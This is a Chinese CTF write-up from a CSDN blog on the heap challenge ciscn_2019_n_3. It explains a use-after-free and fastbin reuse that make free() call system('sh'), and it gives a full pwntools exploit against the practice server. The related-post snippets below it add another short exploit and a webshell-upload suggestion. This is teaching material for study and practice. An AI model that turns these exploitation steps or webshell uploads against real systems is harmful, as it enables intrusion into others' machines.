ciscn_2019_n_3 writeup

最新推荐文章于 2023-07-23 22:05:45 发布
最新推荐文章于 2023-07-23 22:05:45 发布
阅读量620 收藏
点赞数
文章标签: 1024程序员节
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_43921239/article/details/109252885
版权
本文详细介绍了如何利用CISCN 2019挑战赛中一个堆管理器的未初始化指针使用(UAF)漏洞,通过构造特定的数据块和内存布局,操纵fastbin以达到控制`system`函数的参数,最终执行`system('sh')`获取shell。过程包括创建和释放chunk,利用fastbin特性以及精心设计的payload,展示了利用技巧和漏洞利用流程。
摘要由CSDN通过智能技术生成

基本情况

这题被环境坑了一把,用的是 docker 环境做题,checksec 检测是保护全开,ida 分析时也没有留意地址都是真实地址,所以一直没想用 system@plt getshell 。。。后面才发现程序是关闭 PIE ,程序有 system ,直接调用不需要泄露 libc 操作。

程序是一个有增删查的堆管理器,根据存储资料的类型分为两类,对应结构体如下:

struct int_chunk
{
	void *rec_int_print();
    void *rec_int_free();
    int num;
};

struct str_chunk
{
	void *rec_str_print();
    void *rec_str_free();
    char *chunk_ptr;
}

在两个 free 函数中都是没有将指针置零,造成 UAF :

int __cdecl rec_str_free(void *ptr)
{
  free(*((void **)ptr + 2));                    // data chunk
  free(ptr);                                    // UAF
  return puts("Note freed!");
}

思路

利用 UAF 和 fastbin 控制 fd 为 sh\x00\x00 ,bk 为 system 。

  1. chunk0 作为 data chunk 被修改,chunk1 作为 chunk0 的结构体:

    create(0,1,1)#0x10
create(1,1,1)#0x10

  2. 释放 chunk0、chunk1 ,根据 fastin 特点,将 chunk1 申请为结构体,chunk2 为 data chunk :

    free(0)
free(1)
payload = b'sh\x00\x00' + p32(elf.plt['system']) + b'\n'
create(3,2,payload,0xc)#0xc-->0x8-->chunk0

    如上写入后调用 free 功能,实际执行命令:system('sh\x00')。如果写入是 system + sh 的组合调用 show 功能是不能 getshell ,实际运行的是:system(*(system)) 。具体功能调用传参如下:

    //show
(*(int (__cdecl **)(int))chunk_ptr_list[v0])(chunk_ptr_list[v0]);
//free
(*(int (__cdecl **)(int))(chunk_ptr_list[v0] + 4))(chunk_ptr_list[v0]);

EXP

from pwn import *
context(log_level='debug',arch='i386',
	terminal=['tmux','sp','-h'])
# p = process(["/glibc/2.27/32/lib/ld-2.27.so", "./ciscn_2019_n_3"], env={"LD_PRELOAD":"/glibc/2.27/32/lib/libc.so.6"})
p = remote("node3.buuoj.cn",26766)
elf = ELF("./ciscn_2019_n_3")
libc = ELF("/glibc/2.27/32/lib/libc.so.6")

def create(id,type,content,length=0):
	p.recvuntil("> ")
	p.sendline('1')
	p.recvuntil("> ")
	p.sendline(str(id))
	p.recvuntil("> ")
	if(type==1):
		p.sendline(str(type))
		p.recvuntil("> ")
		p.sendline(str(content))
	else:
		p.sendline(str(type))
		p.recvuntil("> ")
		p.sendline(str(length))
		p.recvuntil("> ")
		p.send(content)
def free(id):
	p.recvuntil("> ")
	p.sendline('2')
	p.recvuntil("> ")
	p.sendline(str(id))
def show(id):
	p.recvuntil("> ")
	p.sendline('3')
	p.recvuntil("> ")
	p.sendline(str(id))

create(0,1,1)
create(1,1,1)
create(2,1,1)

free(0)
free(1)

payload = b'sh\x00\x00' + p32(elf.plt['system']) + b'\n'
create(3,2,payload,0xc)


# gdb.attach(p,"b *0x08048934")
free(0)


p.interactive()
SkYe231_
关注
【pwn】ciscn_2019_s_3
Nothing
12-14 4583
这题是全国大学生信息安全竞赛的一道线下半决赛题目,好像是华南赛区? 例行检查。 分析程序。 vul函数 两个系统调用,一个是sys_read,一个是sys_write,往栈上写数据(0x400),从栈上读数据(0x30),存在栈溢出。 还有一个gadget函数。 有两个值得注意的地方。mov rax,0fh 以及mov rax 59。这两个gadget控制了rax的值,看看这两个是什么系统调用...
初学pwn-BUUCTF(ciscn_2019_n_1)
天柱的博客
08-31 635
初学pwn-writeUp BUUCTF的第四道题,ciscn-2019_n_1。 首先还是链接远端查看一下。 这里提示让猜一个数字,然后他告诉我们,这个数字应该是11.28125。这就有点掩耳盗铃了呀,但是输入了11.28125,还是在说应该输入11.28125。可能是有点问题,ida打开查看一下。 可以看到主函数里,调用了三个函数,前两个都是set某个值,我们直接看func函数。 那这就很明显了,刚刚输入的值赋给了v1,但是这里是要让v2的值等于11.28125才可以。查看一下地址。 嗯,跟想象
[BUUOJ] ciscn_2019_n_3
Joaus的博客
10-06 1832
这里写自定义目录标题漏洞点漏洞利用exp 漏洞点 可以看到主要就是在free的时候没有将相应的数组里的置0,可以导致UAF的漏洞: 漏洞利用 由于本题将printf和free函数的指针都放在了申请的堆上,而且程序调用了system函数因此我们就不用泄露libc基址了,我们的目标就是取得对存放指针的堆块的控制。 我们可以利用fastbin的LIFO的机制,取得对存放指针的堆块的控制,修改free指...
ciscn_2019_ne_3
seaaseesa的博客
05-07 439
ciscn_2019_ne_3 (在rop长度过小情况下,通过read劫持read自身的返回来达到后续大量rop) 首先检查一下程序的保护机制 然后,我们用IDA分析一下,32位栈溢出,难点在于结束变更了两次esp,因此,我们单纯的溢出,直接会造成esp变更到一个无效的地址处。 因此,我们需要将将ecx覆盖为bss段,将栈切换到bss上进行rop。但是切换到bss之前,需要先...
ciscn_2019_n_1
weixin_44110537的博客
08-26 524
栈溢出覆盖掉v2为11.28125的存储形式从而打开后门. from pwn import * p=remote('xxxxxxxxxx',xxxxx) payload='I'*(0x30-0x04)+p32(0b01000001001101001000000000000000) p.recvuntil('Let\'s guess the number.') p.sendline(payload) p.interactive() ...
[BUUCTF]PWN——ciscn_2019_n_3
mcmuyanga的博客
01-06 899
ciscn_2019_n_3 附件 步骤 例行检查,32位,开启了nx和canary保护 本地试运行一下,经典的堆题的菜单 3.32位ida载入 new(),申请了两个chunk,第一个chunk(13行)固定大小0xC,存放的是rec_int_print和rec_int_free函数的地址,第二个chunk(32行),是我们申请的chunk del() 如果值是整数,直接 free chunk 如果值是字符串,则 chunk 和存储字符串的 chunk 都要 free。注意这里只是进行了
2021国赛CISCN 初赛 部分RE writeup
weixin_45803474的博客
09-14 412
glass 题目名称:glass 题目描述:Reverse sign in,flag形式为"CISCN{XXXXX}" 首先查看apk 界面如下 用AndroidKiller打开,反编译成java源码 这里只是声明了一下checkflag函数 要去native-lib里找 分析\glass\Project\lib\armeabi-v7a中的libnative-lib.so IDA打开 怀疑是RC4加密 参考 https://www.cnblogs.com/SunsetR/p/12247041.html
[CISCN 2023 初赛]go_session 解题思路&过程
最新发布
iamblackcat's blog
07-23 1134
[CISCN 2023 初赛]go_session 解题思路&过程
【CTF题解NO.00009】CISCN2021-初赛-pwn write up by arttnba3
arttnba3的博客
05-21 741
【CTF题解NO.00009】CISCN2021-初赛-pwn write up by arttnba3[GITHUB BLOG ADDR](https://arttnba3.cn/2021/05/15/CTF-0X04-CISCN2021-PRELIMINARY/)0x00.绪论0x01.场景实操 开场卷pwny | Donelonelywolf | Donechannel0x02.场景实操 二阶卷silverwolf | Donegame0x03.场景实操 冲刺卷satool GITHUB BLOG A
BUUCTF_WriteUp 2021-08-23
m0_56897090的博客
08-23 377
2021-08-23 文章目录2021-08-23shell_asm题目描述题目分析BabyROP题目描述解题思路0x01 整体思路0x02 额外前置知识:0x03 expnot_the_same_3dsctf_20160x01 解题思路0x02 expBJDCTF-babystack0x01 解题思路0x02 Expjarvisoj_level20x01 整体分析0x02 exp32位0x03 64位解法get_started_3dsctf_20160x01 程序整体分析预期解法解法2:mprotectc
ciscn_2019_n_3
12-30
ciscn(全国大学生信息安全竞赛),2019年的一道题目,涉及到fastbin堆漏洞的利用。由于调用了system函数,所以漏洞利用的难度不大,推荐初学者练习。题解链接:https://blog.csdn.net/A951860555/article/details/111991072
buuctf ciscn_2019_n_3
weixin_45677731的博客
08-31 272
do_new函数: 申请一个0xc大小的chunk,前四个字节存放的是输出函数的地址,中间四个字节存储的是删除函数的地址,最后四个字节,因数据类型的不同而不同 当你选择整数类型,最后四个字节存放的就是一个数字 当你选择文本类型,你就可以向程序请求申请一个一定大小的chunk用于存放文本,而最后四个字节存放的就是这个新的chunk的地址 do_dump函数: 输出内容 do_del函数: 发现free并未将指针置0,再看rec_int_free函数和rec_str_free函数,也没有置0,存在UAF的漏
ciscn_2019_n_3 题解
lifanxin的博客
12-30 610
Write Up知识点关键字样本运行静态分析求解思路求解脚本 知识点关键字 UAF fastbin 样本 ciscn_2019_n_3 运行 检查样本   32位小端程序,开启了栈保护和NX保护。 运行样本   样本的运行结果如上图所示:该程序主要模仿了一个笔记管理的功能,选项1可以开辟新的节点,会让选中是整型还是文本;选项2会让我们根据索引删除一个节点;选型3可以打印一个节点中存储的数据信息;选项4主要是打印一个随机生成的金钱数目,告诉你没法购买Pro版本。   此处不赘述也不一一截图运行结果,读者可
[BUUCTF-pwn]——ciscn_2019_n_3
Y_peak的博客
11-20 3099
[BUUCTF-pwn]——ciscn_2019_n_3 结构体: //该结构体仅仅是选择字符串的时候的结构体 struct chunk { void *rec_str_print(); void *rec_str_free(); char *str; } //该结构体仅仅是选择数字的时候的结构体 struct chunk { void *rec_int_print(); void *rec_int_free(); int number; } 这道题目就是简单的u
ciscn_2019_s_3
z1r0的博客
12-07 369
ciscn_2019_s_3 查看保护 可以溢出,但是没有相应的system和bin_sh,可以使用ret2csu也可以使用srop。没有开pie。 这里使用srop,gadgets里给了相应的mov rax, 0FH和vuln的syscall。 泄露bin_sh的话动调一下发现在0x20后有一个地址,这个地址距离输入的bin_sh的偏移为0x118,有了bin_sh的地址之后,srop就可以了。 from pwn import * context(arch='amd64', os='linux',
php upload ctf,强网杯CTF防御赛ez_upload Writeup
05-14
首先,我们需要分析题目所提供的代码: ```php <?php error_reporting(0); if ($_FILES["upload"]["error"] > 0) { echo "Error: " . $_FILES["upload"]["error"] . "<br />"; } else { echo "Upload: " . $_FILES["upload"]["name"] . "<br />"; echo "Type: " . $_FILES["upload"]["type"] . "<br />"; echo "Size: " . ($_FILES["upload"]["size"] / 1024) . " Kb<br />"; move_uploaded_file($_FILES["upload"]["tmp_name"], "upload/" . $_FILES["upload"]["name"]); echo "Stored in: " . "upload/" . $_FILES["upload"]["name"]; } ?> ``` 从上述代码中我们可以发现,这是一个文件上传的代码,该代码运行后会将用户上传的文件存储到 `upload` 目录下。 但是,该代码没有对上传的文件类型进行限制,这意味着我们可以上传任何类型的文件,甚至是一些恶意的文件。我们可以尝试上传一些常见的恶意文件,比如 `webshell`。 我们可以在本地创建一个 `webshell.php` 文件,然后上传到服务器上的 `upload` 目录。上传完成后,我们可以访问 `http://xxx.xxx.xxx.xxx/upload/webshell.php` 来执行我们上传的 `webshell`。 最后,我们需要注意的是,该上传脚本没有做任何安全性检查,这意味着我们可以上传任意大小的文件,这可能会影响服务器的性能,甚至导致服务器崩溃。因此,在实际应用中,我们应该对上传的文件大小进行限制,同时对上传的文件类型进行检查,从而确保服务器的安全性。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值